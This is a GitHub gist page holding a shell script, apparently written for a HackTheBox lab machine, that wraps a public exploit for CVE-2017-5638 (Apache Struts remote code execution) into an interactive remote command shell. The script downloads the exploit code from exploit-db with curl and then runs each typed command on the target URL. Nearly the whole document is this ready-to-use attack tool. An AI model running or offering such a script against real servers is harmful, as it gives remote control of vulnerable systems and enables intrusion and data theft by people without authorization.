Last active
August 13, 2019 14:19
-
-
Save chrispetrou/5fd343a15ad588570df409200ee4348f to your computer and use it in GitHub Desktop.
A semi-interactive shell for the CVE-2017-5638 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # A semi-interactive shell for the CVE-2017-5638 exploit | |
| # (it is actually a wrapper of the CVE-2017-5638 exploit) | |
| # which simply makes the shell a bit more functional. | |
| # used on HackTheBox, stratosphere machine: http://10.10.10.64/Monitoring/example/Welcome.action | |
| if [ ! -z "$1" ]; then | |
| url=$1 | |
| else | |
| echo "Usage: $0 <url>" | |
| exit | |
| fi | |
| if [ ! -f 41570.py ] && [ ! -r 41570.py ] && [ ! -s 41570.py ]; then | |
| curl -o 41570.py https://www.exploit-db.com/raw/41570 | |
| fi | |
| while true ; do | |
| read -p '[cmd]: ' cmd | |
| if [ ! -z "$cmd" ] | |
| then | |
| python 41570.py $url "$cmd" | while read line ; do | |
| echo $line | |
| done | |
| fi | |
| done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment